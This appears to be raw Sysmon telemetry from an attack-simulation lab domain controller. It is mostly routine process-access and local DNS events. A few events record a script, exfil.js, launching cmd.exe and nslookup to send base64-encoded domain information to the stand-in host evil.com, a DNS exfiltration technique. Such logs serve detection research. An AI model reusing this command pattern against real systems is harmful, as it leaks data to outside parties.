14:21:32.329{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209150Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.329{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-B943-000000005F02}6032C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209149Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.329{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209148Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.329{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209147Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.329{2E1864BB-18EC-629A-B743-000000005F02}48481096C:\Windows\system32\cmd.exe{2E1864BB-18EC-629A-B943-000000005F02}6032C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209146Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.330{2E1864BB-18EC-629A-B943-000000005F02}6032C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EC-629A-B743-000000005F02}4848C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrvgfq.tmp 2>&1 10341000x8000000000000000209145Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.313{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-B843-000000005F02}388C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209144Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.298{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EC-629A-B843-000000005F02}388C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209143Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.298{2E1864BB-18EC-629A-B843-000000005F02}3885200C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-B743-000000005F02}4848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209142Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.282{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-B843-000000005F02}388C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209141Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.282{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209140Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.282{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209139Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.282{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209138Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.282{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209137Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.282{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18EC-629A-B743-000000005F02}4848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209136Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.282{2E1864BB-18E0-629A-6742-000000005F02}39767580C:\Windows\System32\WScript.exe{2E1864BB-18EC-629A-B743-000000005F02}4848C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209135Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.287{2E1864BB-18EC-629A-B743-000000005F02}4848C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrvgfq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209134Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.282{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldpeyn.tmpMD5=0E5FCD35CD053EF552028604630DF807,SHA256=10CB74BA0B52EDCD250F65D3C712B6E8DE326D18DDB63A8E97ADD31848C9E0E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000209133Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.408{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50681- 354300x8000000000000000209132Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.408{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50680- 354300x8000000000000000209131Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.408{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50679- 354300x8000000000000000209130Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.305{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50678- 354300x8000000000000000209129Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.305{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50677- 354300x8000000000000000209128Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.303{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50676- 354300x8000000000000000209127Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.210{00000000-0000-0000-0000-000000000000}884<unknown process>-udpfalsefalse127.0.0.1-50675-false127.0.0.1-53domain 354300x8000000000000000209126Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.210{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50675- 354300x8000000000000000209125Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.210{00000000-0000-0000-0000-000000000000}884<unknown process>-udptruefalse127.0.0.1-50675-false127.0.0.1-53domain 354300x8000000000000000209124Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.210{00000000-0000-0000-0000-000000000000}884<unknown process>-udpfalsefalse127.0.0.1-50674-false127.0.0.1-53domain 354300x8000000000000000209123Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.210{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50674- 354300x8000000000000000209122Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.210{00000000-0000-0000-0000-000000000000}884<unknown process>-udptruefalse127.0.0.1-50674-false127.0.0.1-53domain 354300x8000000000000000209121Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.210{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50673- 354300x8000000000000000209120Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.107{00000000-0000-0000-0000-000000000000}4932<unknown process>-udpfalsefalse127.0.0.1-50672-false127.0.0.1-53domain 354300x8000000000000000209119Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.107{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50672- 354300x8000000000000000209118Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.107{00000000-0000-0000-0000-000000000000}4932<unknown process>-udpfalsefalse127.0.0.1-50671-false127.0.0.1-53domain 354300x8000000000000000209117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.107{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50671- 354300x8000000000000000209116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.106{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50670- 354300x8000000000000000209115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.007{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50669- 354300x8000000000000000209114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.007{00000000-0000-0000-0000-000000000000}2076<unknown process>-udpfalsefalse127.0.0.1-50668-false127.0.0.1-53domain 354300x8000000000000000209113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.007{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50668- 354300x8000000000000000209112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.006{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50667- 354300x8000000000000000209111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:30.006{00000000-0000-0000-0000-000000000000}2076<unknown process>-udptruefalse127.0.0.1-50667-false127.0.0.1-53domain 354300x8000000000000000209110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.909{00000000-0000-0000-0000-000000000000}2384<unknown process>-udpfalsefalse127.0.0.1-50666-false127.0.0.1-53domain 354300x8000000000000000209109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.909{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50666- 354300x8000000000000000209108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.909{00000000-0000-0000-0000-000000000000}2384<unknown process>-udptruefalse127.0.0.1-50666-false127.0.0.1-53domain 354300x8000000000000000209107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.909{00000000-0000-0000-0000-000000000000}2384<unknown process>-udpfalsefalse127.0.0.1-50665-false127.0.0.1-53domain 354300x8000000000000000209106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.909{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50665- 354300x8000000000000000209105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.909{00000000-0000-0000-0000-000000000000}2384<unknown process>-udptruefalse127.0.0.1-50665-false127.0.0.1-53domain 354300x8000000000000000209104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.909{00000000-0000-0000-0000-000000000000}2384<unknown process>-udpfalsefalse127.0.0.1-50664-false127.0.0.1-53domain 354300x8000000000000000209103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.909{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50664- 354300x8000000000000000209102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.909{00000000-0000-0000-0000-000000000000}2384<unknown process>-udptruefalse127.0.0.1-50664-false127.0.0.1-53domain 354300x8000000000000000209101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.825{00000000-0000-0000-0000-000000000000}1372<unknown process>-udpfalsefalse127.0.0.1-50663-false127.0.0.1-53domain 10341000x8000000000000000209100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.228{2E1864BB-18EC-629A-B543-000000005F02}73282328C:\Windows\system32\conhost.exe{2E1864BB-18EC-629A-B643-000000005F02}4816C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.228{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:32.228{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 